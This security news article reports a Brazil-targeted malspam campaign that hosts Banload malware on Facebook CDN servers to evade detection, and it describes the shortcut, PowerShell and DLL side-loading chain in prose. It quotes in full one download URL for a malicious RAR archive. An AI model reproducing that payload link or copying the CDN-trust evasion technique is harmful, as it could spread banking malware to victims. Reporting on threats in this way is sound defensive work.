Crooks leverage Facebook CDN servers to bypass security solutions

Crooks are abusing Facebook CDN servers to deliver malware and evading detection exploiting the trust in the CDN network of the social networking giant.

Crooks are abusing Facebook CDN (Content Delivery Network) servers to store malware and to deliver it evading detection exploiting the trust in the CDN network of the social network giant.

Researchers from MalwareHunter team uncovered several campaigns leveraging Facebook CDN servers in the last two weeks, in the past, the same malware group used Dropbox and Google’s cloud storage services to store the same payloads.

In July researchers at Palo Alto Networks published a detailed report on an ongoing malspam campaign targeting Brazil, in that circumstance the crooks used legitimate services like Google and Dropbox to deliver the malware.

Back to the present, the use of Facebook CDN allows the cyber criminals to bypass security solutions because the domain is trusted by them and the related traffic is not blocked. The

Cybercriminals use to send spoofed emails that pose as official communications from local authorities. The messages include a link that leads to Facebook CDN. The link point to URL related to files uploaded by the gang in Facebook groups or other public section.

Below one of the links used by the gang.

https://cdn.fbsbx.com/v/t59.2708-21/20952350_119595195431306_4546532236425428992_n.rar/NF-DANFE_FICAL-N-5639000.rar?oh=9bb40a7aaf566c6d72fff781d027e11c&oe=59AABE4D&dl=1

and the related spam message

Once the victim clicks on the link he will download an RAR or ZIP file containing a link file. The shortcut invokes a legitimate application installed on most windows PC (i.e. Command Prompt or PowerShell) to run an encoded PowerShell script. This technique is known as Squiblydoo, experts observed APT32 using it while targeting Vietnamese interests around the globe.

The encoded PowerShell script downloads and runs another PowerShell script that execute a large number of operations.

“The second PowerShell script downloads a loader DLL file, which in turn downloads a legitimate EXE file and a second DLL.” wrote Catalin Cimpanu from BleepingComputer.

“The twisted maze of operations continues with the creation of another link (shortcut) file that points to a VBS script. The PowerShell script then invokes the shortcut file, which in turn invokes the VBS script, which in turn executes the legitimate EXE file, which in turn side-loads the second DLL file.”

Crooks are targeting only users in Brazil, the attack chain is interrupted by downloading an empty last-stage DLL file when the victim is from another country.

The campaign is delivering the Banload malware downloader which is used to serve the Win32/Spy.Banker.ADYV banking trojan that targets Brazilian users only.

Experts believe the threat actor is the same behind the Banload campaign that targeted Brazil in 2016 and spread the Escelar banking Trojan in 2015.

Experts from MalwareHunter believe the malware group is very sophisticated and well-resourced.

“a campaign MalwareHunter spotted on September 2 pushed out emails that were viewed by at least 200,000 Brazilian users. Two other campaigns also garnered between 70,000-80,000 views each.” continues Bleepingcomputers.

[adrotate banner=”9″]

Pierluigi Paganini

(Security Affairs – Facebook CDN server, malware)

[adrotate banner=”12″]